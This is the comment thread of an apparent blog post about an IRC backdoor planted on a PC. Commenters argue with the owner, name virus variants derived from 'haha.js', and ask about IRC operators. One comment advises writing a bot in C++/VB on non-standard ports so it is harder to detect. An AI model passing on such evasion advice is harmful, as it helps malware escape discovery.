  3. Oh my, the clever, smart and oh-so-wise one... your Year 3 kid can tell too?? This is just more twisting of words, see? A Year 3 kid can tell it's a backdoor? Hey friend, if you're going to spin a story at least be reasonable, mind your words, you're a grown man and with a Year 3 kid at that, what's the point of lying to everyone who visits this URL by claiming your kid also knows about this backdoor... ("even my Year 3 kid could tell that the files you planted on this PC are an IRC backdoor.") It's obvious that the users who visit this website can work out for themselves whether this clever-and-smart one is a flatterer, a bootlicker, or otherwise... we all know your intentions are good, smart guy, but... that's just how IRC is, hmm, or are you after cheap publicity! Well, whatever, thanks for the information anyway, since it tells the schoolkids... hurhmmm, in closing, may IRC progress for the nation...

    Owner: hehheh sorry, Mr tukangajar. What I actually meant was just to contrast the coding skill. I didn't literally mean that a Year 3 kid would know it's a backdoor. But if Mr tukangajar has ever taught K-12 kids, you'd know how far their coding skills go. 🙂 Anyway, I hope Mr tukangajar will be willing to point out any mistakes I've made. Happy Eid 😀

    Comment by tukangajar | October 24, 2007

  4. I have a feeling I've also come across that file before.

    ariyako: yes, there are several viruses built from the haha.js source, namely virusmawar.js (same function as haha.js) and also Worm.VBS.autorun.j (also adapted from the haha.js virus, but whose main function is spreading an IRC BOT)

    Comment by Furkan | February 27, 2008

  5. I agree, that IRC bot really is dumb. Using mirc.exe to plant a bot, anyone can find it easily. If you're going to build a bot, use C++/VB and use a server port other than 6667-7000. Hmm.. that's probably the limit of what the owner who planted that bot can do.

    Knowledge Is Power! 🙂

    Comment by anonymous | August 8, 2008

  6. Assalamu'alaikum Najib, how are you? Najib, same name as my neighbour 🙂 Good information, but is the Razie mentioned in this article the one who is an operator on Kampung DALnet?

    Comment by Muhammad Zulkhibri Bin Musa @ Munir | August 19, 2008

  7. ampeh.. ^maxtor^ and ircclient, are they the same coder? kakakaka who knows where they ripped this from

    Comment by Webnet-user | June 27, 2009

